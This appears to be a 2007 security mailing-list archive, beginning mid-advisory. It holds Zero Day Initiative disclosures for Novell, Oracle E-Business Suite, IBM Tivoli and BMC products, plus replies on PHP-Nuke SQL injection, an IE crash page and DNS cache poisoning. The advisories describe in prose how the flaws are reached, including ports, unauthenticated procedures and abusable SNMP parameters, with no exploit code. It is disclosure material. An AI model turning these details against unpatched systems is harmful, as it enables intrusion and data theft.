336 bytes will trigger a stack based buffer overflow due to a vulnerable base64_decode() call. Exploitation of this issue can result in arbitrary code execution. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://download.novell.com/Download?buildid=8RF83go0nZg~ http://download.novell.com/Download?buildid=O9ucpbS1bK0~ -- Disclosure Timeline: 2007.03.19 - Vulnerability reported to vendor 2007.04.18 - Coordinated public release of advisory 2007.04.19 - Digital Vaccine released to TippingPoint customers -- Credit: This vulnerability was discovered by Tenable Network Security. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
ZDI-07-016: Oracle E-Business Suite Arbitrary Node Deletion Vulnerability
ZDI-07-016: Oracle E-Business Suite Arbitrary Node Deletion Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-016.html April 18, 2007 -- CVE ID: CVE-2007-2170 -- Affected Vendor: Oracle -- Affected Products: Oracle E-Business Suite -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since December 14, 2006 by Digital Vaccine protection filter ID 4919. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to delete any existing Document Management node on vulnerable installations of Oracle E-Business Suite. Authentication is not required to exploit this vulnerability. The specific flaw exists in the APPLSYS.FND_DM_NODES package. The procedure to delete nodes does not check for a valid session thereby allowing an attacker to arbitrarily delete any node registered, including the root node. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html -- Disclosure Timeline: 2007.01.29 - Vulnerability reported to vendor 2006.12.14 - Digital Vaccine released to TippingPoint customers 2007.04.18 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Joxean Koret. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
ZDI-07-017: Oracle E-Business Suite Arbitrary Document Download Vulnerability
ZDI-07-017: Oracle E-Business Suite Arbitrary Document Download Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-017.html April 18, 2007 -- CVE ID: CVE-2007-2135 -- Affected Vendor: Oracle -- Affected Products: Oracle E-Business Suite -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since December 14, 2006 by Digital Vaccine protection filter ID 4924. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to download any existing document in the APPS.FND_DOCUMENTS table on vulnerable installations of Oracle E-Business Suite. Authentication is not required to exploit this vulnerability. The specific flaw exists in the ADI_BINARY component of the E-Business Suite. The component exposes a parameter that can also be passed to ADI_DISPLAY_REPORT to allow an attacker to view any document in the APPS.FND_DOCUMENTS table. An attacker can cycle through all document IDs to display each document that exists. -- Vendor Response: Oracle has issued an update to correct this vulnerability. More details can be found at: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html -- Disclosure Timeline: 2007.01.29 - Vulnerability reported to vendor 2006.12.14 - Digital Vaccine released to TippingPoint customers 2007.04.18 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Joxean Koret. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vunlerability
ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vunlerability http://www.zerodayinitiative.com/advisories/ZDI-07-018.html April 18, 2007 -- CVE ID: CVE-2007-2137 -- Affected Vendor: IBM -- Affected Products: IBM Tivoli Monitoring Express 6.1 -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of IBM Tivoli Monitoring Express. Authentication is not required to exploit this vulnerability. The specific flaws exist in the Tivoli Universal Agent Primary Service (TCP 10110), Monitoring Agent for Windows OS - Primary (TCP 6014) and Tivoli Enterprise Portal Server (TCP 14206) services. When a long string is sent to these services, it will result in a heap overflow during a call to a vulnerable function in kde.dll resulting in the ability to execute arbitrary code. -- Vendor Response: IBM has issued an update to correct this vulnerability. More details can be found at: http://www-1.ibm.com/support/docview.wss?uid=swg24012341 -- Disclosure Timeline: 2006.09.14 - Vulnerability reported to vendor 2007.04.18 - Public release of advisory -- Credit: This vulnerability was discovered by CIRT.DK. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Re: PHP Nuke = 8.0.0.3.3b SQL Injections and Bypass SQL Injection Protection vulnerabilities
[EMAIL PROTECTED] wrote: PHP Nuke = 8.0.0.3.3b SQL Injections and Bypass SQL Injection Protection vulnerabilities PROGRAM: PHP-Nuke HOMEPAGE: http://phpnuke.org/ VERSION: All version BUG: PHP Nuke = 8.0.0.3.3b Bypass SQL Injection Protection and SQL Injections vulnerabilities AUTHOR: Aleksandar Let's look at source code from mainfile.php line 435 __ //Union Tap //Copyright Zhen-Xjell 2004 http://nukecops.com //Beta 3 Code to prevent UNION SQL Injections No offense, but newer versions were released. You're quoting old UT code.
Re: Internet Explorer Crash
IV. Proof http://www.infiltrated.net/stupidInternetExploder.html For what it's worth this killed my Toshiba Satellite A100-49 (1.66GHz Intel Core Duo) running Solaris Developer Express (b55) with Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.3) Gecko/20070321 Firefox/2.0.0.3 stone dead. Even the clock stopped ticking! Regards, Rob -- Sun Microsystems Weave a circle round him thrice, mailto: [EMAIL PROTECTED]And close your eyes with holy dread, Tel: +44 1252-426-299 For he on honey-dew hath fed, Mobile: +44 7710-901-702 And drunk the milk of Paradise.
ZDI-07-019: BMC Patrol PerformAgent bgs_sdservice Memory Corruption Vulnerability
ZDI-07-019: BMC Patrol PerformAgent bgs_sdservice Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-019.html April 18, 2007 -- CVE ID: CVE-2007-2136 -- Affected Vendor: BMC -- Affected Products: Patrol -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since April 13, 2007 by Digital Vaccine protection filter ID 5287. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of BMC Patrol. User interaction is not required to exploit this vulnerability. The specific flaw exists due to improper parsing of XDR data sent to the bgs_sdservice.exe process listening by default on TCP port 10128. An attacker can influence a parameter to a memory copy operation and cause corruption of the stack and including SEH pointers. This can be leveraged to execute arbitrary code. -- Vendor Response: BMC has provided the following statement: [This issue] has been addressed, and a patch has been made available to our customers. A flash bulletin has been created describing the patch and will be sent to all affected customers in the next few days. BMC has a formal customer support mechanism in place to provide solutions to security issues brought to us by those who have legally licensed our software. In cases where security issues are brought to my attention by individuals/vendors who do not have legal access to our products, we will investigate their merit; however the issues will be addressed at our own discretion and according to our understanding of their severity. Finally, please note that in the future, I will only communicate resolutions and workarounds to licensed customers who are using our software legally. For a more meaningful dialogue around these issues and to be notified of any available patches, I urge all licensed customers to use BMC's support mechanism. -- Disclosure Timeline: 2007.03.05 - Vulnerability reported to vendor 2007.04.13 - Digital Vaccine released to TippingPoint customers 2007.04.18 - Public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
ZDI-07-020: BMC Performance Manager SNMP Command Execution Vulnerability
ZDI-07-020: BMC Performance Manager SNMP Command Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-020.html April 18, 2007 -- CVE ID: CVE-2007-1972 -- Affected Vendor: BMC -- Affected Products: Performance Manager -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since April 13, 2007 by Digital Vaccine protection filter ID 5286. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: These vulnerabilities allows attackers to execute arbitrary code on vulnerable installations of BMC Performance Manager. User interaction is not required to exploit this vulnerability. The specific flaw exists in the PatrolAgent.exe listening on TCP port 3181. The service allows remote attackers to modify configuration files without authentication. This can be exploited by an attacker by modifying parameters in SNMP communities definitions. By modifying the masterAgentName and masterAgentStartLine parameters, an attacker can execute arbitrary code. -- Vendor Response: BMC has provided the following statement: [This issue] has been found not to be a security vulnerability; when properly configured (as described for our customers in our documentation and in our online knowledge base) this attack is not possible. BMC has a formal customer support mechanism in place to provide solutions to security issues brought to us by those who have legally licensed our software. In cases where security issues are brought to my attention by individuals/vendors who do not have legal access to our products, we will investigate their merit; however the issues will be addressed at our own discretion and according to our understanding of their severity. Finally, please note that in the future, I will only communicate resolutions and workarounds to licensed customers who are using our software legally. For a more meaningful dialogue around these issues and to be notified of any available patches, I urge all licensed customers to use BMC's support mechanism. -- Disclosure Timeline: 2007.03.05 - Vulnerability reported to vendor 2007.04.13 - Digital Vaccine released to TippingPoint customers 2007.04.18 - Public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
Re: Windows DNS Cache Poisoning by Forwarder DNS Spoofing
The attack described just now, is that this vulnerability combined with the traditional birthday attack scenario allows another form of attack. The birthday attacks in general are still possible on any DNS server which doesn't randomize source ports, but may be more difficult to conduct than this new attack. (I'm not sure, I haven't run the numbers.) Thank you for the clarification, Tim. That is exactly what I wanted to say. :) By the way, as regards recent Bind 9, birthday attack is much more difficult to conduct because even if the attacker sends multiple simultaneous recursive queries, Bind 9 aggregates these queries. In addition, there is a patch written by Jinmei-san for Bind 9.4.0 (current release) to randomize source ports. http://www.jinmei.org/bind-9.4.0-portpool.patch http://member.wide.ad.jp/tr/wide-tr-dns-bind9-portpool-01.txt (technical report from WIDE project in Japanese) Makoto Shiotsuki